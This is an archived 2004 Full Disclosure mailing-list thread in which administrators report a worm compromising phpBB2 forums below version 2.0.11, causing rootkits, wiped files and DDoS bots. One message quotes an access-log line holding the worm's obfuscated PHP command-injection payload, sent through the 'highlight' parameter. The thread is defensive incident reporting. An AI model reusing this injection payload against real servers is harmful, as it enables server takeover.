Full Disclosure mailing list archives
RE: Worm hitting PHPbb2 Forums
From: "Mike" <mike_sha () shaw ca>
Date: Tue, 21 Dec 2004 13:28:27 -0500
Does this affect PHPBB2 in general, or is it platform specific as well? Mike Fetherston
-----Original Message----- From: mark () onnow net [mailto:mark () onnow net] Sent: Tuesday, December 21, 2004 12:47 PM To: L. Walker Cc: incidents () securityfocus com; full-disclosure () lists netsys com Subject: Re: Worm hitting PHPbb2 Forums Front what I have read, this can happen in any phpbb version lower
than
2.0.11 This exploit is becoming frequent. Normally uploading a ddos bot. Mark Quoting "L. Walker" <lwalker () magi net au>:Just spotted two clients hit by this. One client didnt update his software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation
16.
Chkrootkit says its Adore, however could be something else.
Datacenter
wasn't very smart and has since wiped the server, so no binaries orotherevidence. Generation 12 only wiped out PHP files, replacing them with its own message on other client's PHPbb2 forum. Access logs show: 66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlig ht
=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252ech r(
32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252ech r(
112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252ec hr
(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252ec hr
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252 ec
hr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252 ec
hr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)% 25
2echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)% 25
2echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106 )%
252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78 )%
252echr(41)%252echr(34))%252e%2527HTTP/1.0" 200 270
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5 ac
a2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252ech r(
114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252ec hr
(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252 ec
hr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252e ch
r(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252 ec
hr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%25 2e
chr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110) %2
52echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89) %2
52echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(12 2)
%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(9 7)
%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" -- L. Walker <lwalker at magi dot net dot au> Network Administrator / Consultant ------------------------------------------------------------------ This message was sent using IMP, the Internet Messaging Program.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Worm hitting PHPbb2 Forums David Devault (Dec 21)
- <Possible follow-ups>
- RE: Worm hitting PHPbb2 Forums Christopher Adickes (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mike (Dec 22)
- RE: Worm hitting PHPbb2 Forums M. Shirk (Dec 21)
- Re: RE: Worm hitting PHPbb2 Forums Willem Koenings (Dec 22)
- RE: RE: Worm hitting PHPbb2 Forums Patrick Nolan (Dec 23)
- RE: RE: Worm hitting PHPbb2 Forums Paul Laudanski (Dec 23)
- Re: Worm hitting PHPbb2 Forums mark (Dec 22)
- RE: Worm hitting PHPbb2 Forums Mattias R. Lindgren (Dec 23)